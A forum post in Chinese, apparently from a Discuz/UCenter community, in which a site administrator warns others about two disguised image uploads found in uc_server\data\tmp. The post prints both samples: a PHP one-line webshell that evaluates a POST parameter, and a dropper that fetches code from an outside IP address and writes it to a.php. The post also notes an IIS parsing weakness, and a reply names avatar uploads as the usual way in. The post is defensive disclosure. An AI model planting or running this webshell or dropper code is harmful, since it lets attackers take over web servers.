uc_server\data\tmp被上傳木馬文件 建議自查

onlygod

登錄/注冊(cè)后可看大圖

今天網(wǎng)站搬家，順手用最新版的D盾掃描了一下，發(fā)現(xiàn)兩個(gè)可疑文件，圖片格式。

路徑為：uc_server\data\tmp

將格式圖片格式的后綴改為  .php，用記事本打開(kāi)，發(fā)現(xiàn)一句話(huà)木馬，兩個(gè)文件分別如下：

1. <?php @eval($_POST['1']);?>

復(fù)制代碼

1. <script language="php"> $save=file_get_contents('http://103.198.194.134/php/xz.txt');  file_put_contents('a.php',$save) ;</script>

復(fù)制代碼

目前暫時(shí)沒(méi)掃出其他木馬，懷疑上傳木馬后并沒(méi)有成功執(zhí)行。

文件名分別為：
upload37372
upload29060

后面的數(shù)字應(yīng)該是用戶(hù)ID，建議將圖片改成隨機(jī)數(shù)字命名，否則容易被黑客利用。
IIS的解析漏洞，配合這個(gè)，有可能能拿下webshell。

-------建議大家自查一下。  不知道新版有木有這個(gè)漏洞，知道的大神說(shuō)下。

我知道答案 回答被采納將會(huì)獲得1 貢獻(xiàn) 已有1人回答

耗子

這種情況一般都是頭像進(jìn)來(lái)的， 做好防護(hù)措施  尤其服務(wù)器  廣告IIS有這個(gè)漏洞 包括  這個(gè)是PHP的漏洞